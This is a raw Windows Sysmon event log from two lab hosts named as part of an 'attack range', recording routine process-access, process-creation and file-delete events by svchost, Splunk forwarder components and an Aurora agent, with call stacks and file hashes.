12:26:32.993{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017760Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:32.993{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017759Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:32.993{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017758Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:32.993{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017757Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:32.993{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017756Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:32.993{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017755Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:32.993{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017754Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:32.993{E5A8D418-DC43-63C7-0500-00000000B002}416964C:\Windows\system32\csrss.exe{E5A8D418-E578-63C7-2402-00000000B002}3744C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000017753Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:32.993{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E578-63C7-2402-00000000B002}3744C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000017752Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:32.993{E5A8D418-E578-63C7-2402-00000000B002}3744C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000017751Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:32.821{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4BACD33896219F43A9DE6F366879503E,SHA256=F07478D1E4724F673554187D892D79933BA95762AEB8C5724FF3E98D5FBEDF64,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045336Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:32.628{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3CD94F1B7A8BF1375EB512B02F9E216A,SHA256=1F68FEFBD39D189384C632942C635881B96242DE68A76E07ACFD15AC2FABBEE1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000045335Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:32.519{FE4C2B44-E578-63C7-6E06-00000000AF02}42883216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045334Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:32.417{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E578-63C7-6E06-00000000AF02}4288C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000045333Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:32.416{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E578-63C7-6E06-00000000AF02}4288C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000045332Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:32.416{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E578-63C7-6E06-00000000AF02}4288C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000045331Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:32.416{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E578-63C7-6E06-00000000AF02}4288C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000045330Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:32.416{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E578-63C7-6E06-00000000AF02}4288C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000045329Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:32.416{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E578-63C7-6E06-00000000AF02}4288C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000017750Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:32.531{E5A8D418-E578-63C7-2302-00000000B002}25402568C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+610325|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60fe56|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60943|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60f97|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+9e7f20|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017749Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:32.327{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E578-63C7-2302-00000000B002}2540C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017748Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:32.327{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017747Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:32.327{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017746Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:32.327{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017745Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:32.327{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017744Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:32.327{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017743Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:32.327{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017742Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:32.327{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017741Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 